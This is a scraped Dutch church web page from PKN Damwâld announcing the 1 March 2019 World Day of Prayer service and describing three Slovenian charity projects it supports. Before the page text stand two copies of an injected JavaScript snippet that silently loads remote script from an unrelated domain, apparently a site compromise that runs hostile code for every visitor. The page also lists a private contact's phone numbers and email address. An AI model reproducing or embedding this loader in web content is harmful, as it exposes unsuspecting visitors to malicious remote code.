;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wereldgebedsdag 1 maart 2019 ... Welkom, God nodigt je uit! - PKN Damwâld

Wereldgebedsdag 1 maart 2019 … Welkom, God nodigt je uit!

Gepubliceerd op: dinsdag 19 februari 2019

Welkom, God nodigt je uit!   Dit is het thema van wereldgebedsdag 2019. De plaatselijke commissie nodigt u/jou/jullie uit om op vrijdag 1 maart as. om 19.30 uur de jaarlijkse gebedsdienst bij te wonen in de Doopsgezinde Kerk aan de Doniawei in Damwâld.  Een muzikale bijdrage verleent door organist: Baukje Bosch-Haisma. De liturgie voor deze viering, dit jaar is samengesteld door vrouwen uit Slovenië.
Wereldsgebedsdag Nederland maakt deel uit van een wereldwijde organisatie van Christenen en heeft als motto: samen vieren, samen bidden, samen delen!

De plaatselijke commissie vraagt uw aandacht bij het volgende: Wilt u ook eens een kijkje nemen achter de schermen en in de commissie plaatsnemen dan bent u van harte welkom om u aan te melden. Onze commissie is erg klein en kunnen wel ondersteuning gebruiken. U kunt zicht aanmelden bij een van de commissieleden op de avond of contact op te nemen met Lourenske Herrema 0511-702643 b.g.g. 0649812249 cavie@live.nl

Iedereen van jong tot oud is van harte welkom. Welkom, God nodigt je uit!

 Met vriendelijke groet, Wereldgebedsdagcommissie Damwâld e.o.

De opbrengst van deze avond wordt besteed aan 3 projecten in Slovenië.
– ASPI-centrum:
een nieuw centrum voor jongeren met het Asperger-syndroom en voor autistische jongeren dat in 2018 geopend is. Jongeren kunnen hier revalideren en door middel van trainingen leren om zelfstandig te wonen. In de toekomst willen zij ook huisvesting op het eigen terrein realiseren.
Een (blijf van mijn lijf)huis voor moeders:
een thuis voor vrouwen met psychische, fysieke of andere problemen die veroorzaakt zijn door huiselijk geweld; meestal hebben zij hun kinderen bij zich. Zij ondervinden veel problemen door sociale uitsluiting en door armoede. Het programma dat in dit huis aangeboden wordt, omvat workshops en er zijn ervaren hulpverleners die hen helpen bij deze situatie en die allerlei nieuwe vaardigheden aanbieden om de problemen aan te pakken.
– Roma-project in Pušča:
Romaburgers worden nog steeds tweederangsburgers in Slovenië. Pušča is het grootste Sloveense Romadorp waar geprobeerd wordt om het zelfbewustzijn van de unieke cultuur van de Roma te vergroten. Ze organiseren workshops voor de vrouwen, jongeren en kinderen op het vlak van zelfrespect, onderwijs en begeleiden hen bij het zoeken naar werk.